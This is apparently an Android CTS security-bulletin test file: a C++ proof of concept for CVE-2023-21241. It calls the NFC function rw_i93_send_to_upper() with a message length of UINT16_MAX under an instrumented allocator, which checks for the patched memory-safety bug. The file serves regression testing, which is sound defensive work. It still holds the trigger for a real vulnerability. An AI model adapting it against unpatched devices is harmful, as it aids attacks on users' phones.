xref: /aosp_15_r20/cts/hostsidetests/securitybulletin/securityPatch/CVE-2023-21241/poc.cpp (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf)
1 /*
2  * Copyright (C) 2023 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at:
7  *
8  * http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  *
16  */
17 
18 #include "../includes/common.h"
19 #include "../includes/memutils.h"
20 #include "nfc_types.h"
21 #include "rw_int.h"
22 #include "sys/types.h"
23 #include "tags_defs.h"
24 #include <stdint.h>
25 #include <sys/sysinfo.h>
26 #include <vector>
27 
// Function under test. It is declared here by hand rather than through a
// header; the definition is expected to come from the NFC library this PoC is
// linked against.
void rw_i93_send_to_upper(NFC_HDR *p_resp);

// Filled in by sysinfo() in main() to estimate how much memory is available.
struct sysinfo memInfo;

// Reader/writer control block owned by the library being tested.
extern tRW_CB rw_cb;

// Backing storage for the buffer handed out by the GKI_getbuf() override
// below. A single vector is reused, so only the most recent buffer is valid.
std::vector<uint8_t> p_buff;

// Backing storage for the NFC_HDR message that main() passes to
// rw_i93_send_to_upper().
std::vector<uint8_t> v_pmsg;

// Selects which allocator checks are active.
// NOTE(review): presumably consumed by ../includes/memutils.h, where the
// ENABLE_* flags would be defined; confirm there.
char enable_selective_overload = ENABLE_NONE;
35 
// Reader/writer callback that deliberately does nothing. main() registers it
// so that rw_cb.p_cback is a valid function pointer; both arguments are
// ignored.
void poc_cback(tRW_EVENT, tRW_DATA *) {
  // Intentionally empty.
}
37 
// Test-side replacement for GKI_getbuf(): serves the requested buffer out of
// the global vector p_buff instead of a GKI pool.
//
// size: number of bytes requested by the caller.
// Returns a pointer to p_buff's storage. The vector keeps ownership, and a
// later call resizes the same vector, so a pointer from an earlier call must
// not be used afterwards.
// NOTE(review): how the matching free path treats this pointer is not visible
// in this file.
void *GKI_getbuf(uint16_t size) {
  // Statement order matters: every check is switched on only for the resize,
  // so the allocation made for p_buff happens with ENABLE_ALL in effect.
  // NOTE(review): presumably this is what lets memutils detect an
  // out-of-bounds access on the returned buffer; confirm in memutils.h.
  enable_selective_overload = ENABLE_ALL;
  p_buff.resize(size);

  // After the allocation, keep only the free/realloc checks active.
  enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;

  uint8_t *const storage = p_buff.data();
  return static_cast<void *>(storage);
}
44 
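// Regression check for CVE-2023-21241: sets up the NFC reader/writer state,
// then calls rw_i93_send_to_upper() with a message whose length field is the
// largest value a uint16_t can hold. Any buffer the callee requests through
// GKI_getbuf() comes from the instrumented override defined in this file.
//
// Returns EXIT_SUCCESS when the call comes back normally.
// NOTE(review): how a detected memory error is reported (signal, exit code)
// is decided by memutils and the test harness, not by this file.
int main() {
  // Check if there is structure mismatch between testing library and the
  // library that is being tested
  tNFC_ACTIVATE_DEVT p_activate_params = {};
  p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
  p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
  RW_SetActivatedTagType(&p_activate_params, &poc_cback);
  FAIL_CHECK(rw_cb.p_cback == &poc_cback);
  GKI_init();
  rw_init();

  // Find the free memory available. The sysinfo() result is checked so that a
  // failed call is reported as such instead of showing up as "not enough
  // memory" through the zero-initialised global memInfo.
  FAIL_CHECK(sysinfo(&memInfo) == 0);
  unsigned long long freeVirtualMem = memInfo.freeram;
  freeVirtualMem += memInfo.freeswap;
  freeVirtualMem *= memInfo.mem_unit;
  // Only continue when the message fits in 80% of the free memory.
  FAIL_CHECK((sizeof(NFC_HDR) + UINT16_MAX) < freeVirtualMem * 0.8);

  // Call rw_i93_send_to_upper() with large value of p_msg->len. The vector is
  // sized for the header plus UINT16_MAX bytes, so the claimed length is fully
  // backed by the test's own storage.
  v_pmsg.resize(sizeof(NFC_HDR) + UINT16_MAX);
  NFC_HDR *p_msg = reinterpret_cast<NFC_HDR *>(v_pmsg.data());
  rw_cb.tcb.i93.sent_cmd = I93_CMD_READ_SINGLE_BLOCK;
  p_msg->offset = 0;
  p_msg->len = UINT16_MAX;
  // The callback is assigned again before the call.
  // NOTE(review): presumably rw_init() above resets rw_cb; confirm.
  rw_cb.p_cback = &poc_cback;
  rw_i93_send_to_upper(p_msg);
  return EXIT_SUCCESS;
}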
73